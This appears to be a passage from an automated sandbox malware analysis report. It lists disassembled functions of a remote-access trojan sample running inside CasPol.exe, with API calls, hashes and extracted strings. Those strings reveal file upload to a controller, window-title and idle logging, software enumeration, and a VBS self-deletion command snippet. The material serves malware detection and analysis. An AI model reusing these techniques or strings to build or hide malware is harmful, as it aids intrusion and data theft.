                                                                                                              Function 0044E20E Relevance: 24.4, APIs: 16, Instructions: 419COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$EnvironmentVariable
                                                                                                              • String ID:
                                                                                                              • API String ID: 1464849758-0
                                                                                                              • Opcode ID: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                                                                              • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                                                              • Opcode Fuzzy Hash: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                                                                              • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                                                              Function 0041B824 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                                                                              • RegEnumKeyExA.ADVAPI32 ref: 0041B88A
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseEnumOpen
                                                                                                              • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                              • API String ID: 1332880857-3714951968
                                                                                                              • Opcode ID: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                                                                              • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                                                                              • Opcode Fuzzy Hash: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                                                                              • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                                                                              Function 0041CA9E Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                                              • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                                              • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                                              • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                                              • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                                              • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                              • String ID: Close
                                                                                                              • API String ID: 1657328048-3535843008
                                                                                                              • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                              • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                                              • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                              • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                                              Function 00444F3D Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$Info
                                                                                                              • String ID:
                                                                                                              • API String ID: 2509303402-0
                                                                                                              • Opcode ID: d1da9e7b30878a4a49500d5bdd2d15103fb4e7496709f5eeefc3f26d3dc5ccb1
                                                                                                              • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                                                              • Opcode Fuzzy Hash: d1da9e7b30878a4a49500d5bdd2d15103fb4e7496709f5eeefc3f26d3dc5ccb1
                                                                                                              • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                                                              Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00407F4C
                                                                                                              • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                              • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040821A
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                              • API String ID: 1884690901-3066803209
                                                                                                              • Opcode ID: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                                                                              • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                                                              • Opcode Fuzzy Hash: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                                                                              • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                                                              Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                                • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00409DCD
                                                                                                                • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000), ref: 00409E10
                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 00409F40
                                                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041B633
                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0040A049
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                              • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                              • API String ID: 3795512280-3163867910
                                                                                                              • Opcode ID: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                                                                              • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                                                              • Opcode Fuzzy Hash: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                                                                              • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                                                                              Function 0045006D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                                                • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                                              • _free.LIBCMT ref: 004500A6
                                                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000), ref: 00446ADB
                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                              • _free.LIBCMT ref: 004500C8
                                                                                                              • _free.LIBCMT ref: 004500DD
                                                                                                              • _free.LIBCMT ref: 004500E8
                                                                                                              • _free.LIBCMT ref: 0045010A
                                                                                                              • _free.LIBCMT ref: 0045011D
                                                                                                              • _free.LIBCMT ref: 0045012B
                                                                                                              • _free.LIBCMT ref: 00450136
                                                                                                              • _free.LIBCMT ref: 0045016E
                                                                                                              • _free.LIBCMT ref: 00450175
                                                                                                              • _free.LIBCMT ref: 00450192
                                                                                                              • _free.LIBCMT ref: 004501AA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                              • String ID:
                                                                                                              • API String ID: 161543041-0
                                                                                                              • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                              • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                                                              • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                              • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                                                              Function 00419128 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 0041912D
                                                                                                              • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                                              • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                              • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                              • API String ID: 489098229-65789007
                                                                                                              • Opcode ID: a40dca5e55645720ca30496181093a362b70aa5652279529810e28997b425322
                                                                                                              • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                                              • Opcode Fuzzy Hash: a40dca5e55645720ca30496181093a362b70aa5652279529810e28997b425322
                                                                                                              • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                                                              Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                              • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                              • API String ID: 994465650-2151626615
                                                                                                              • Opcode ID: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                                                                              • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                                              • Opcode Fuzzy Hash: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                                                                              • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF
                                                                                                              Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00412679
                                                                                                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32 ref: 00412692
                                                                                                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                              • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                              • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                              • API String ID: 1913171305-390638927
                                                                                                              • Opcode ID: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                                                                              • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                                                              • Opcode Fuzzy Hash: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                                                                              • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                              Function 0044F3E1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free
                                                                                                              • String ID:
                                                                                                              • API String ID: 269201875-0
                                                                                                              • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                              • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                                                              • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                                              • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                                                              Function 00454982 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000), ref: 0045466D
                                                                                                              • GetLastError.KERNEL32 ref: 00454A96
                                                                                                              • __dosmaperr.LIBCMT ref: 00454A9D
                                                                                                              • GetFileType.KERNEL32 ref: 00454AA9
                                                                                                              • GetLastError.KERNEL32 ref: 00454AB3
                                                                                                              • __dosmaperr.LIBCMT ref: 00454ABC
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                                              • GetLastError.KERNEL32 ref: 00454C58
                                                                                                              • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                              • String ID: H
                                                                                                              • API String ID: 4237864984-2852464175
                                                                                                              • Opcode ID: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                                                                              • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                                                              • Opcode Fuzzy Hash: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                                                                              • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                                                              Function 0040A3F4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 158sleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                              • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                              • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040A4A4
                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                              • String ID: [${ User has been idle for $ minutes }$]
                                                                                                              • API String ID: 911427763-3954389425
                                                                                                              • Opcode ID: a59f2f13793784003892e63950edf61f9792dfbe12456e4cbfe946a207096c8a
                                                                                                              • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                                              • Opcode Fuzzy Hash: a59f2f13793784003892e63950edf61f9792dfbe12456e4cbfe946a207096c8a
                                                                                                              • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                                                                              Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 65535$udp
                                                                                                              • API String ID: 0-1267037602
                                                                                                              • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                              • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                                              • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                              • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                                              Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040CA04
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LongNamePath
                                                                                                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                              • API String ID: 82841172-425784914
                                                                                                              • Opcode ID: 2c32c8423f05266584aa4a08fe5fa9c2e4569a415b98fb848e0406cdb68be249
                                                                                                              • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                                              • Opcode Fuzzy Hash: 2c32c8423f05266584aa4a08fe5fa9c2e4569a415b98fb848e0406cdb68be249
                                                                                                              • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F
                                                                                                              Function 00439361 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                                              • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                                              • __dosmaperr.LIBCMT ref: 004393CD
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                                              • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                                              • __dosmaperr.LIBCMT ref: 0043940A
                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                                              • __dosmaperr.LIBCMT ref: 0043945E
                                                                                                              • _free.LIBCMT ref: 0043946A
                                                                                                              • _free.LIBCMT ref: 00439471
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2441525078-0
                                                                                                              • Opcode ID: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                                                                              • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                                              • Opcode Fuzzy Hash: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                                                                              • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                                              Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                              • GetMessageA.USER32 ref: 00404F21
                                                                                                              • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                              • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                                              • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 0040502B
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                              • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                              • API String ID: 2956720200-749203953
                                                                                                              • Opcode ID: 0622db17b8ffedd3531a9fa1e5e3f576bb625bfe4daf1fd40acc4f0bc4360242
                                                                                                              • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
